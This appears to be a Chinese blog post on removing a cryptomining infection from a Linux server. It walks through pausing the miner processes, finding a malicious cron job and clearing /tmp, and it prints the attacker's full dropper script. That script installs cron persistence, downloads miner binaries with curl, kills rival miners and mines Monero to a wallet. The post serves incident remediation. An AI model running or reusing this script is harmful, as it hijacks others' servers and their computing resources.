服务器LIUNX之如何解决矿机问题,服务器liunx解决矿


点进来的基本都是遇到liunx变矿机的小伙伴吧(cpu运载300%) 卡的连终端都很难打开
开下来之后提示 大意是, 到xxx网站给钱了事, 不过基本这个网站基本也上不去, 要么是暴力破解, 要么是通过 redis 6379端口 详情了解redis安全漏洞

遇到这种问题毫无疑问: 

    

  • 先要把突然出现的乱七八糟的占cpu过高的进程kill -stop pid 暂停掉, 不要尝试直接kill -9 pid 
    • 

  • cd /etc/cron 查看定时任务 如果在/var/spool/cron这里面也看下 
    • 

  • 非法的定时任务 内容大概是这样的
    
 */5 * * * * curl -fsSL  http://www.hacker.com/ltc/minerd/pm.sh | sh 
    
 意思很明确了,   前面的*/5 * * * * 大家很眼熟吧
    
 curl 是liunx上模拟 浏览器请求的命令 -fsSl 大概意思就是啥都不显示, 你看到下载信息 | sh 下载后运行
    
 来看下脚本内容
    • 

  • 


    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.223" ]; then
    curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.223
fi
chmod +x /tmp/ddg.223 && /tmp/ddg.223

CleanTail()
{
    ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}

DoYam()
{
    if [ ! -f "/tmp/AnXqV.yam" ]; then
        curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
    fi
    chmod +x /tmp/AnXqV.yam
    /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
}

DoMiner()
{
    if [ ! -f "/tmp/AnXqV" ]; then
        curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
    fi
    chmod +x /tmp/AnXqV
    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
}

DoMinerNoAes()
{
    if [ ! -f "/tmp/AnXqV.noaes" ]; then
        curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes
    fi
    chmod +x /tmp/AnXqV.noaes
    /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
}

ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
ps auxf|grep -v grep|grep "AnXqV" || DoYam
ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes
    


     
    

    • 

  • 最后 到 /tmp/中删除所有的文件 完全没关系 记得用ll -a 看下隐藏的文件, 也要删掉
    •

多多了解没错的

 

相关内容